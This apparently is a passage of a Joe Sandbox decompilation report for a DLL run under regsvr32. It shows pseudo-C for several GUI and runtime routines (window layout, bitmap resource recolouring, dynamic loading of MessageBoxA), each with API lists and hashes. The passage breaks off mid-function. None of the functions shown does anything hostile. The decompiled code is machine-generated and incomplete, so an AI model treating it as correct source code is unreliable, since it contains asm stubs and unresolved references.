                                                                        				intOrPtr _t264;
                                                                        				int _t273;
                                                                        				signed int _t280;
                                                                        				signed int _t287;
                                                                        				intOrPtr* _t297;
                                                                        				intOrPtr _t302;
                                                                        				signed int _t310;
                                                                        				signed int _t312;
                                                                        				intOrPtr _t319;
                                                                        				signed int _t325;
                                                                        				intOrPtr _t326;
                                                                        				signed int _t329;
                                                                        				int _t334;
                                                                        				intOrPtr* _t341;
                                                                        
                                                                        				_t297 = __ecx;
                                                                        				E1002F49A( &_v28, _a8, _a12);
                                                                        				if(IsRectEmpty(_t297 + 0xac) != 0) {
                                                                        					GetClientRect( *(E10022A96(_t297) + 0x1c),  &_v84);
                                                                        					_t188 = _v84.right - _v84.left;
                                                                        					_t302 = _v84.bottom - _v84.top;
                                                                        				} else {
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					 *((intOrPtr*)( *_t297 + 0x13c))( &_v68, _a12);
                                                                        					_t188 = _v68.right - _v68.left;
                                                                        					_t302 = _v68.bottom - _v68.top;
                                                                        				}
                                                                        				_t334 = 0;
                                                                        				_v44 = _t188;
                                                                        				_v40 = _t302;
                                                                        				if( *((intOrPtr*)(_t297 + 0xa8)) == 0) {
                                                                        					_v132 = BeginDeferWindowPos( *(_t297 + 0x9c));
                                                                        				} else {
                                                                        					_v132 = 0;
                                                                        				}
                                                                        				_t190 =  *0x1004efa0; // 0x2
                                                                        				_v36 =  ~_t190;
                                                                        				_t192 =  *0x1004efa4; // 0x2
                                                                        				_v32 =  ~_t192;
                                                                        				_v16 = _t334;
                                                                        				_v12 = _t334;
                                                                        				_v8 = _t334;
                                                                        				if( *(_t297 + 0x9c) <= _t334) {
                                                                        					L72:
                                                                        					if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && _v132 != _t334) {
                                                                        						EndDeferWindowPos(_v132);
                                                                        					}
                                                                        					SetRectEmpty( &_v100);
                                                                        					 *((intOrPtr*)( *_t297 + 0x13c))( &_v100, _a12);
                                                                        					if(_a8 == _t334 || _a12 == _t334) {
                                                                        						if(_v28 != _t334) {
                                                                        							_v28 = _v28 + _v100.left - _v100.right;
                                                                        						}
                                                                        					}
                                                                        					if(_a8 == _t334 || _a12 != _t334) {
                                                                        						if(_v24 != _t334) {
                                                                        							_v24 = _v24 + _v100.top - _v100.bottom;
                                                                        						}
                                                                        					}
                                                                        					_t198 = _a4;
                                                                        					 *_t198 = _v28;
                                                                        					 *((intOrPtr*)(_t198 + 4)) = _v24;
                                                                        					return _t198;
                                                                        				} else {
                                                                        					do {
                                                                        						_t341 = E1002CE0B(_t297, _v8);
                                                                        						_v20 = _t341;
                                                                        						_t206 =  *((intOrPtr*)(E100086F2(_t297 + 0x94, _v8)));
                                                                        						if(_t341 == _t334) {
                                                                        							if(_t206 != _t334) {
                                                                        								goto L71;
                                                                        							}
                                                                        							L58:
                                                                        							_t208 = _v16;
                                                                        							if(_t208 != _t334) {
                                                                        								if(_a12 == _t334) {
                                                                        									_t310 = _v36 + _t208 -  *0x1004efa0;
                                                                        									_v36 = _t310;
                                                                        									if(_v28 <= _t310) {
                                                                        										_v28 = _t310;
                                                                        									}
                                                                        									_t210 = _v32;
                                                                        									if(_v24 <= _t210) {
                                                                        										_v24 = _t210;
                                                                        									}
                                                                        									_t211 =  *0x1004efa4; // 0x2
                                                                        									_v32 =  ~_t211;
                                                                        								} else {
                                                                        									_t312 = _v32 + _t208 -  *0x1004efa4;
                                                                        									_t214 = _v36;
                                                                        									_v32 = _t312;
                                                                        									if(_v28 <= _t214) {
                                                                        										_v28 = _t214;
                                                                        									}
                                                                        									if(_v24 <= _t312) {
                                                                        										_v24 = _t312;
                                                                        									}
                                                                        									_t215 =  *0x1004efa0; // 0x2
                                                                        									_v36 =  ~_t215;
                                                                        								}
                                                                        								_v16 = _t334;
                                                                        							}
                                                                        							goto L71;
                                                                        						}
                                                                        						if( *((intOrPtr*)( *_t341 + 0x150))() == 0) {
                                                                        							L51:
                                                                        							if(_v12 != _t334) {
                                                                        								goto L71;
                                                                        							}
                                                                        							L52:
                                                                        							 *((intOrPtr*)( *_t341 + 0x154))( &_v132);
                                                                        							goto L71;
                                                                        						}
                                                                        						_t221 =  *(_t341 + 0x7c);
                                                                        						if((_t221 & 0x00000004) == 0 || (_t221 & 0x00000001) == 0) {
                                                                        							asm("sbb eax, eax");
                                                                        							_t225 = ( ~(_t221 & 0x0000a000) & 0xfffffffa) + 0x10;
                                                                        						} else {
                                                                        							_t225 = 6;
                                                                        						}
                                                                        						 *((intOrPtr*)( *_t341 + 0x134))( &_v52, 0xffffffff, _t225);
                                                                        						E100086B2( &_v68, _v36, _v32, _v52, _v48);
                                                                        						GetWindowRect( *(_t341 + 0x1c),  &_v84);
                                                                        						E10028E5A(_t297,  &_v84);
                                                                        						if(_a12 == _t334) {
                                                                        							_t233 = _v84.top;
                                                                        							if(_t233 > _v68.top &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                        								OffsetRect( &_v68, _t334, _t233 - _v68.top);
                                                                        							}
                                                                        							_t234 = _v68.bottom;
                                                                        							_t319 = _v40;
                                                                        							if(_t234 > _t319 &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                        								_t325 = _t319 - _t234 - _v68.top -  *0x1004efa4;
                                                                        								_t256 = _v32;
                                                                        								if(_t325 > _t256) {
                                                                        									_t256 = _t325;
                                                                        								}
                                                                        								OffsetRect( &_v68, _t334, _t256 - _v68.top);
                                                                        							}
                                                                        							if(_v12 == _t334) {
                                                                        								if(_v68.top < _v40 -  *0x1004efa4) {
                                                                        									goto L44;
                                                                        								}
                                                                        								_t247 = _v8;
                                                                        								if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t247 - 1))) == _t334) {
                                                                        									goto L44;
                                                                        								} else {
                                                                        									goto L56;
                                                                        								}
                                                                        							} else {
                                                                        								_t251 =  *0x1004efa4; // 0x2
                                                                        								_v12 = _t334;
                                                                        								OffsetRect( &_v68, _t334,  ~(_v68.top + _t251));
                                                                        								L44:
                                                                        								if(EqualRect( &_v68,  &_v84) == 0) {
                                                                        									if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										asm("movsd");
                                                                        										_t341 = _v20;
                                                                        										_t334 = 0;
                                                                        									}
                                                                        									E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
                                                                        								}
                                                                        								_v32 = _v68.top -  *0x1004efa4 + _v48;
                                                                        								_t243 = _v52;
                                                                        								if(_v16 > _t243) {
                                                                        									goto L52;
                                                                        								} else {
                                                                        									_v16 = _t243;
                                                                        									goto L51;
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							_t263 = _v84.left;
                                                                        							if(_t263 > _v68.left &&  *((intOrPtr*)(_t297 + 0x90)) == _t334) {
                                                                        								OffsetRect( &_v68, _t263 - _v68.left, _t334);
                                                                        							}
                                                                        							_t264 = _v68.right;
                                                                        							_t326 = _v44;
                                                                        							if(_t264 <= _t326 ||  *((intOrPtr*)(_t297 + 0x90)) != _t334) {
                                                                        								L22:
                                                                        								if(_v12 == _t334) {
                                                                        									if(_v68.left < _v44 -  *0x1004efa0) {
                                                                        										L27:
                                                                        										if(EqualRect( &_v68,  &_v84) == 0) {
                                                                        											if( *((intOrPtr*)(_t297 + 0xa8)) == _t334 && ( *(_t341 + 0x7c) & 0x00000001) == 0) {
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												asm("movsd");
                                                                        												_t341 = _v20;
                                                                        												_t334 = 0;
                                                                        											}
                                                                        											E10020D81( &_v132,  *(_t341 + 0x1c),  &_v68);
                                                                        										}
                                                                        										_v36 = _v52 -  *0x1004efa0 + _v68.left;
                                                                        										_t273 = _v48;
                                                                        										if(_v16 <= _t273) {
                                                                        											_v16 = _t273;
                                                                        										}
                                                                        										goto L52;
                                                                        									}
                                                                        									_t277 = _v8;
                                                                        									if(_v8 <= _t334 ||  *((intOrPtr*)(E100086F2(_t297 + 0x94, _t277 - 1))) == _t334) {
                                                                        										goto L27;
                                                                        									} else {
                                                                        										L56:
                                                                        										E1001E2F0(_t297, _t297 + 0x94, _t334, 1, _v8, _t334, 1);
                                                                        										_v12 = 1;
                                                                        										goto L58;
                                                                        									}
                                                                        								}
                                                                        								_t280 =  *0x1004efa0; // 0x2
                                                                        								_v12 = _t334;
                                                                        								OffsetRect( &_v68,  ~(_t280 + _v68.left), _t334);
                                                                        								goto L27;
                                                                        							} else {
                                                                        								_t329 = _t326 - _t264 -  *0x1004efa0 - _v68.left;
                                                                        								_t287 = _v36;
                                                                        								if(_t329 > _t287) {
                                                                        									_t287 = _t329;
                                                                        								}
                                                                        								OffsetRect( &_v68, _t287 - _v68.left, _t334);
                                                                        								goto L22;
                                                                        							}
                                                                        						}
                                                                        						L71:
                                                                        						_v8 = _v8 + 1;
                                                                        					} while (_v8 <  *(_t297 + 0x9c));
                                                                        					goto L72;
                                                                        				}
                                                                        			}























































                                                                        0x1002d507
                                                                        0x1002d508
                                                                        0x1002d50b
                                                                        0x1002d50b
                                                                        0x1002d518
                                                                        0x1002d518
                                                                        0x1002d529
                                                                        0x1002d52c
                                                                        0x1002d532
                                                                        0x1002d538
                                                                        0x1002d538
                                                                        0x00000000
                                                                        0x1002d532
                                                                        0x1002d4b9
                                                                        0x1002d4be
                                                                        0x00000000
                                                                        0x1002d668
                                                                        0x1002d668
                                                                        0x1002d676
                                                                        0x1002d67b
                                                                        0x00000000
                                                                        0x1002d67b
                                                                        0x1002d4be
                                                                        0x1002d48e
                                                                        0x1002d4a0
                                                                        0x1002d4a3
                                                                        0x00000000
                                                                        0x1002d466
                                                                        0x1002d46f
                                                                        0x1002d471
                                                                        0x1002d476
                                                                        0x1002d478
                                                                        0x1002d478
                                                                        0x1002d483
                                                                        0x00000000
                                                                        0x1002d483
                                                                        0x1002d45c
                                                                        0x1002d6eb
                                                                        0x1002d6eb
                                                                        0x1002d6f1
                                                                        0x00000000
                                                                        0x1002d397

                                                                        APIs
                                                                        • IsRectEmpty.USER32 ref: 1002D2FA
                                                                        • GetClientRect.USER32 ref: 1002D338
                                                                        • BeginDeferWindowPos.USER32(?), ref: 1002D365
                                                                        • GetWindowRect.USER32 ref: 1002D41B
                                                                        • OffsetRect.USER32(?,?,00000000), ref: 1002D44E
                                                                        • OffsetRect.USER32(?,?,00000000), ref: 1002D483
                                                                        • OffsetRect.USER32(?,00000002,00000000), ref: 1002D4A3
                                                                        • EqualRect.USER32 ref: 1002D4DD
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D559
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D58E
                                                                        • OffsetRect.USER32(?,00000000,?), ref: 1002D5B2
                                                                        • EqualRect.USER32 ref: 1002D5C0
                                                                        • EndDeferWindowPos.USER32(?), ref: 1002D70D
                                                                        • SetRectEmpty.USER32(?), ref: 1002D717
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Offset$Window$DeferEmptyEqual$BeginClient
                                                                        • String ID:
                                                                        • API String ID: 3160784657-0
                                                                        • Opcode ID: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                        • Instruction ID: 3196aec78d80ec659258b0f525fbb29d57e8b94677c4b91abc4d73535c0add33
                                                                        • Opcode Fuzzy Hash: 83e7fc467b9166a097b16c7576a05cfbd0e4a0268d0c5201e18248e7b0a7aaab
                                                                        • Instruction Fuzzy Hash: D5F1023190062ADFCF01DFA8E9889AEBBF5FF48340F54452AE809EB255D730AE45CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E1002B597(signed int _a4, signed int _a8, struct HDC__* _a12) {
                                                                        				void* _v8;
                                                                        				void* _v12;
                                                                        				void* _v16;
                                                                        				void* _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t53;
                                                                        				void* _t54;
                                                                        				signed int _t56;
                                                                        				struct HDC__* _t65;
                                                                        				struct HBITMAP__* _t66;
                                                                        				struct HDC__* _t70;
                                                                        				void* _t78;
                                                                        				int* _t80;
                                                                        				int _t81;
                                                                        				signed int _t84;
                                                                        				signed int _t89;
                                                                        				void* _t102;
                                                                        				struct HDC__* _t103;
                                                                        				BITMAPINFO* _t105;
                                                                        
                                                                        				_t53 = LoadResource(_a4, _a8);
                                                                        				_v20 = _t53;
                                                                        				if(_t53 == 0) {
                                                                        					return _t53;
                                                                        				}
                                                                        				_t54 = LockResource(_t53);
                                                                        				_t78 = _t54;
                                                                        				_v12 = _t78;
                                                                        				if(_t78 == 0) {
                                                                        					L17:
                                                                        					return _t54;
                                                                        				}
                                                                        				_t99 =  *_t78 + 0x40;
                                                                        				_t54 = E100107B6( *_t78 + 0x40);
                                                                        				_t105 = _t54;
                                                                        				if(_t105 == 0) {
                                                                        					L16:
                                                                        					goto L17;
                                                                        				} else {
                                                                        					E10011440(_t105, _t78, _t99);
                                                                        					_t102 = _t105 + _t105->bmiHeader;
                                                                        					_a8 = _a8 & 0x00000000;
                                                                        					do {
                                                                        						_t84 =  *(_t102 + _a8 * 4);
                                                                        						_t56 = 0;
                                                                        						while(_t84 !=  *((intOrPtr*)(0x1003f060 + _t56 * 8))) {
                                                                        							_t56 = _t56 + 1;
                                                                        							if(_t56 < 4) {
                                                                        								continue;
                                                                        							}
                                                                        							goto L12;
                                                                        						}
                                                                        						__eflags = _a12;
                                                                        						if(_a12 == 0) {
                                                                        							_t80 = 0x1003f064 + _t56 * 8;
                                                                        							_v8 = _t80;
                                                                        							_a4 = GetSysColor( *_t80) & 0x000000ff;
                                                                        							_a4 = GetSysColor( *_t80) << 8;
                                                                        							_t89 = _a4 | GetSysColor( *_t80) >> 0x00000010 & 0x000000ff;
                                                                        							__eflags = _t89;
                                                                        							 *(_t102 + _a8 * 4) = _t89;
                                                                        						} else {
                                                                        							__eflags =  *(0x1003f064 + _t56 * 8) - 0x12;
                                                                        							if(__eflags != 0) {
                                                                        								 *(_t102 + _a8 * 4) = 0xffffff;
                                                                        							}
                                                                        						}
                                                                        						L12:
                                                                        						_a8 = _a8 + 1;
                                                                        					} while (_a8 < 0x10);
                                                                        					_t103 = _t105->bmiHeader.biWidth;
                                                                        					_t81 = _t105->bmiHeader.biHeight;
                                                                        					_a4 = _t103;
                                                                        					_a8 = _t81;
                                                                        					_t65 = GetDC(0);
                                                                        					_a12 = _t65;
                                                                        					_t66 = CreateCompatibleBitmap(_t65, _t103, _t81);
                                                                        					_v8 = _t66;
                                                                        					if(_t66 != 0) {
                                                                        						_t70 = CreateCompatibleDC(_a12);
                                                                        						_t81 = SelectObject;
                                                                        						_t103 = _t70;
                                                                        						_v16 = SelectObject(_t103, _v8);
                                                                        						StretchDIBits(_t103, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v12 + 0x28 + (1 << _t105->bmiHeader.biBitCount) * 4, _t105, 0, 0xcc0020);
                                                                        						SelectObject(_t103, _v16);
                                                                        						DeleteDC(_t103);
                                                                        					}
                                                                        					ReleaseDC(0, _a12);
                                                                        					_push(_t105);
                                                                        					E100107C8(_t81, _t103, _t105, 0);
                                                                        					FreeResource(_v20);
                                                                        					_t54 = _v8;
                                                                        					goto L16;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • LoadResource.KERNEL32(?,?), ref: 1002B5A3
                                                                        • LockResource.KERNEL32(00000000), ref: 1002B5B6
                                                                        • GetSysColor.USER32(00000000), ref: 1002B635
                                                                        • GetSysColor.USER32(00000000), ref: 1002B643
                                                                        • GetSysColor.USER32(00000000), ref: 1002B658
                                                                        • GetDC.USER32(00000000), ref: 1002B68A
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1002B696
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 1002B6A6
                                                                        • SelectObject.GDI32(00000000,?), ref: 1002B6B8
                                                                        • StretchDIBits.GDI32(00000000,00000000,00000000,?,00000010,00000000,00000000,?,00000010,00000000,00000000,00000000,00CC0020), ref: 1002B6E7
                                                                        • SelectObject.GDI32(00000000,00000010), ref: 1002B6F1
                                                                        • DeleteDC.GDI32(00000000), ref: 1002B6F4
                                                                        • ReleaseDC.USER32 ref: 1002B6FF
                                                                        • FreeResource.KERNEL32(00000000), ref: 1002B70F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ColorResource$CompatibleCreateObjectSelect$BitmapBitsDeleteFreeLoadLockReleaseStretch
                                                                        • String ID:
                                                                        • API String ID: 2552574679-0
                                                                        • Opcode ID: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                        • Instruction ID: 1ea9c1b9533ce417fa6b339c7b5562dcdd92786e406529d598802b06ae8b31dd
                                                                        • Opcode Fuzzy Hash: 4a5ad1dab68aecf07aa5f852d32257c9b2e2166f836d7eb5f6f679ae4473d668
                                                                        • Instruction Fuzzy Hash: 37416A75500628AFEB02DF65CC88EBE7BB9FF49351B008419F956CA262DB359920DF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 29%
                                                                        			E10019D1D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a14) {
                                                                        				char _v8;
                                                                        				signed char _v12;
                                                                        				char _v20;
                                                                        				intOrPtr* _t13;
                                                                        				intOrPtr* _t14;
                                                                        				intOrPtr* _t17;
                                                                        				void* _t19;
                                                                        				_Unknown_base(*)()* _t23;
                                                                        				_Unknown_base(*)()* _t26;
                                                                        				void* _t28;
                                                                        				struct HINSTANCE__* _t31;
                                                                        				void* _t33;
                                                                        
                                                                        				_t28 = 0;
                                                                        				_t33 =  *0x1004f824 - _t28; // 0x0
                                                                        				if(_t33 != 0) {
                                                                        					L6:
                                                                        					_t13 =  *0x1004f830; // 0x0
                                                                        					if(_t13 == 0) {
                                                                        						L14:
                                                                        						_t14 =  *0x1004f828; // 0x0
                                                                        						if(_t14 != 0) {
                                                                        							_t28 =  *_t14();
                                                                        							if(_t28 != 0) {
                                                                        								_t17 =  *0x1004f82c; // 0x0
                                                                        								if(_t17 != 0) {
                                                                        									_t28 =  *_t17(_t28);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L18:
                                                                        						return  *0x1004f824(_t28, _a4, _a8, _a12);
                                                                        					}
                                                                        					_t19 =  *_t13();
                                                                        					if(_t19 == 0) {
                                                                        						L10:
                                                                        						if( *0x1004f3ec < 4) {
                                                                        							_a14 = _a14 | 0x00000004;
                                                                        						} else {
                                                                        							_a14 = _a14 | 0x00000020;
                                                                        						}
                                                                        						goto L18;
                                                                        					}
                                                                        					_push( &_v8);
                                                                        					_push(0xc);
                                                                        					_push( &_v20);
                                                                        					_push(1);
                                                                        					_push(_t19);
                                                                        					if( *0x1004f834() == 0 || (_v12 & 0x00000001) == 0) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t31 = LoadLibraryA("user32.dll");
                                                                        				if(_t31 == 0) {
                                                                        					L12:
                                                                        					return 0;
                                                                        				}
                                                                        				_t23 = GetProcAddress(_t31, "MessageBoxA");
                                                                        				 *0x1004f824 = _t23;
                                                                        				if(_t23 == 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					 *0x1004f828 = GetProcAddress(_t31, "GetActiveWindow");
                                                                        					 *0x1004f82c = GetProcAddress(_t31, "GetLastActivePopup");
                                                                        					if( *0x1004f3e0 == 2) {
                                                                        						_t26 = GetProcAddress(_t31, "GetUserObjectInformationA");
                                                                        						 *0x1004f834 = _t26;
                                                                        						if(_t26 != 0) {
                                                                        							 *0x1004f830 = GetProcAddress(_t31, "GetProcessWindowStation");
                                                                        						}
                                                                        					}
                                                                        					goto L6;
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(user32.dll,10042378,?,?), ref: 10019D35
                                                                        • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10019D51
                                                                        • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10019D62
                                                                        • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10019D6F
                                                                        • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 10019D85
                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 10019D96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoad
                                                                        • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$user32.dll
                                                                        • API String ID: 2238633743-1612076079
                                                                        • Opcode ID: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                        • Instruction ID: 73afa9dbe871857eb7a6cbb93f9ce1e9c581c4ba614d0cfe0e4c3a87d9d84a08
                                                                        • Opcode Fuzzy Hash: 91e5680946dac06a3d327f814091e349537d114a62d67f7972f557e95ea33b55
                                                                        • Instruction Fuzzy Hash: 40218371600225AAEB41DFB5CEC8EBB3BE8EB05685B15007DF904DE051DB71D980DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 48%
                                                                        			E10039B26(intOrPtr __ecx) {
                                                                        				signed int __ebx;
                                                                        				signed int __edi;
                                                                        				CHAR* __esi;
                                                                        				signed int _t161;
                                                                        				signed int _t164;
                                                                        				intOrPtr* _t170;
                                                                        				signed int _t172;
                                                                        				signed int _t174;
                                                                        				signed int _t178;
                                                                        				void* _t192;
                                                                        				signed short _t203;
                                                                        				signed int _t204;
                                                                        				signed int _t205;
                                                                        				signed int* _t207;
                                                                        				signed int _t209;
                                                                        				void* _t213;
                                                                        				signed int _t214;
                                                                        				signed int _t217;
                                                                        				signed short* _t224;
                                                                        				void* _t233;
                                                                        				CHAR* _t235;
                                                                        				signed int _t236;
                                                                        				intOrPtr* _t237;
                                                                        				void* _t238;
                                                                        				void* _t239;
                                                                        				signed short _t242;
                                                                        				signed int _t243;
                                                                        				intOrPtr _t244;
                                                                        				signed short* _t245;
                                                                        				signed int** _t246;
                                                                        				void* _t247;
                                                                        				void* _t249;
                                                                        				void* _t250;
                                                                        				void* _t253;
                                                                        				void* _t263;
                                                                        
                                                                        				E10011BF0(0x1003b377, _t247);
                                                                        				_t250 = _t249 - 0x60;
                                                                        				 *((intOrPtr*)(_t247 - 0x28)) = __ecx;
                                                                        				_t161 =  *0x1004b0a0(_t233, _t239, _t213);
                                                                        				_t214 = 0;
                                                                        				 *(_t247 - 0x20) = _t161;
                                                                        				if( *((intOrPtr*)(__ecx)) != 0) {
                                                                        					E10011C50(_t247 - 0x4c, 0, 0x10);
                                                                        					_t235 =  *(_t247 + 0x18);
                                                                        					_t253 = _t250 + 0xc;
                                                                        					if(_t235 == 0) {
                                                                        						_t164 =  *(_t247 - 0x44);
                                                                        					} else {
                                                                        						_t164 = lstrlenA(_t235);
                                                                        						 *(_t247 - 0x44) = _t164;
                                                                        					}
                                                                        					 *((intOrPtr*)(_t247 - 0x1c)) = 0xfffffffd;
                                                                        					if(( *(_t247 + 0xc) & 0x0000000c) != 0) {
                                                                        						 *((intOrPtr*)(_t247 - 0x40)) = 1;
                                                                        						 *((intOrPtr*)(_t247 - 0x48)) = _t247 - 0x1c;
                                                                        					}
                                                                        					if(_t164 != _t214) {
                                                                        						_t244 = E1001F77E(_t164 << 4);
                                                                        						 *((intOrPtr*)(_t247 - 0x4c)) = _t244;
                                                                        						E10011C50(_t244, _t214,  *(_t247 - 0x44) << 4);
                                                                        						_t253 = _t253 + 0x10;
                                                                        						_t245 = _t244 + ( *(_t247 - 0x44) << 4) - 0x10;
                                                                        						 *(_t247 - 0x14) = _t235;
                                                                        						 *(_t247 - 0x10) = _t245;
                                                                        						if( *_t235 != 0) {
                                                                        							_t200 =  *((intOrPtr*)(_t247 + 0x1c));
                                                                        							_t246 =  &(_t245[4]);
                                                                        							_t22 = _t200 - 4; // 0xfffffff9
                                                                        							_t217 = _t22;
                                                                        							 *(_t247 - 0x18) = _t246;
                                                                        							 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + 0xfffffff8;
                                                                        							_t238 = 4;
                                                                        							do {
                                                                        								_t203 =  *( *(_t247 - 0x14)) & 0x000000ff;
                                                                        								_t224 =  *(_t247 - 0x10);
                                                                        								 *_t224 = _t203;
                                                                        								if((_t203 & 0x00000040) != 0) {
                                                                        									 *_t224 = _t203 & 0x0000ffbf | 0x00004000;
                                                                        								}
                                                                        								_t204 =  *_t224 & 0x0000ffff;
                                                                        								_t263 = _t204 - 0x4002;
                                                                        								if(_t263 > 0) {
                                                                        									_t205 = _t204 - 0x4003;
                                                                        									__eflags = _t205 - 0x12;
                                                                        									if(_t205 <= 0x12) {
                                                                        										switch( *((intOrPtr*)(_t205 * 4 +  &M10039FEB))) {
                                                                        											case 0:
                                                                        												goto L36;
                                                                        											case 1:
                                                                        												 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                        												_t217 = _t217 + _t238;
                                                                        												_t207 =  *_t217;
                                                                        												asm("sbb ecx, ecx");
                                                                        												 *_t207 =  ~( *_t207) & 0x0000ffff;
                                                                        												goto L37;
                                                                        											case 2:
                                                                        												goto L38;
                                                                        										}
                                                                        									}
                                                                        								} else {
                                                                        									if(_t263 == 0) {
                                                                        										L36:
                                                                        										 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                        										_t217 = _t217 + _t238;
                                                                        										__eflags = _t217;
                                                                        										_t207 =  *_t217;
                                                                        										L37:
                                                                        										 *_t246 = _t207;
                                                                        									} else {
                                                                        										_t209 = _t204;
                                                                        										if(_t209 <= 0x13) {
                                                                        											switch( *((intOrPtr*)(_t209 * 4 +  &M10039F9B))) {
                                                                        												case 0:
                                                                        													 *((intOrPtr*)(_t247 + 0x1c)) =  *((intOrPtr*)(_t247 + 0x1c)) + _t238;
                                                                        													_t217 = _t217 + _t238;
                                                                        													_t210 =  *_t217;
                                                                        													goto L16;
                                                                        												case 1:
                                                                        													goto L36;
                                                                        												case 2:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                        													__eax =  *(__ebp + 0x1c);
                                                                        													__ebx = __ebx + 8;
                                                                        													 *__esi =  *( *(__ebp + 0x1c));
                                                                        													goto L38;
                                                                        												case 3:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                        													__eax =  *(__ebp + 0x1c);
                                                                        													__ebx = __ebx + 8;
                                                                        													 *__esi =  *( *(__ebp + 0x1c));
                                                                        													goto L38;
                                                                        												case 4:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                        													__ebx = __ebx + __edi;
                                                                        													__eflags = __ebx;
                                                                        													__eax =  *__ebx;
                                                                        													__ecx =  *__eax;
                                                                        													goto L22;
                                                                        												case 5:
                                                                        													 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
